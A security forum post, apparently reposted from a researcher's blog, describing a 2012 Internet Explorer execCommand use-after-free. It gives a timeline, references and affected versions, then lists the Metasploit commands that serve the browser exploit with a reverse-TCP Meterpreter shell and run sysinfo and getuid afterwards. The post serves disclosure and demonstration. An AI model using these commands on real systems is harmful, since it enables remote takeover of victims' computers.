Jump to content
1337

Microsoft Internet Explorer execCommand Vulnerability Metasploit Demo

By 1337, in Exploituri

Recommended Posts

1337 Newbie

1337

Posted
Posted

Timeline :

Vulnerability found exploited in the wild and discovered by Eric Romang

First details of the vulnerability the 2012-09-14

Advanced details of the vulnerability provided by binjo the 2012-09-16

Metasploit PoC provided the 2012-09-17

PoC provided by :

unknown

eromang

binjo

sinn3r

juan vazquez

Reference(s) :

OSVDB-85532

Vulnhunt.com

eromang blog

Metasploit

Affected version(s) :

IE 7 on Windows XP SP3

IE 8 on Windows XP SP3

IE 7 on Windows Vista

IE 8 on Windows Vista

IE 8 on Windows 7

IE 9 on Windows 7

Tested on Windows XP Pro SP3 with :

Internet Explorer 8

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer (MSIE). When rendering an HTML page, the CMshtmlEd object gets deleted in an unexpected manner, but the same memory is reused again later in the CMshtmlEd::Exec() function, leading to a use-after-free condition. Please note that this vulnerability has been exploited in the wild since Sep 14 2012, and there is currently no official patch for it.

Commands : 

use exploit/windows/browser/ie_execcommand_uaf
set SRVHOST 192.168.178.33
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

Sursa : eromang blog

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...